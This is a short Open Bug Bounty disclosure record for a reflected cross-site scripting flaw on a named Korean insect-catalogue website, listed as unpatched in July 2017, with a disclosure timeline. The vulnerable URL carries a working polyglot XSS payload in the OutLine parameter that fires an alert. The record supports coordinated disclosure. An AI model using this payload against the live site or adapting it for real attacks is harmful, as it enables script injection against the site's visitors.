Vulnerable URL:
http://insects.ecsoft.co.kr/sub/catalog.php?CatNo=262&OutLine;=1%3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script%3E%3CImage%20SrcSet=K%20*/;%20OnError=alert(`OPENBUGBOUNTY`)%20//%3E&PHPSESSID;=d1f0b48a95bf73dfe723f2b3f3ac0ee2#
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
31.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
12 July, 2017 12:24 GMT |
Vulnerability existence verified and confirmed |
12 July, 2017 22:11 GMT |
Generic security notifications sent to website owner |
12 July, 2017 22:11 GMT |
Notification sent to subscribers (without technical details) |
13 July, 2017 02:17 GMT |
Vulnerability details disclosed by researcher |
19 July, 2017 22:15 GMT |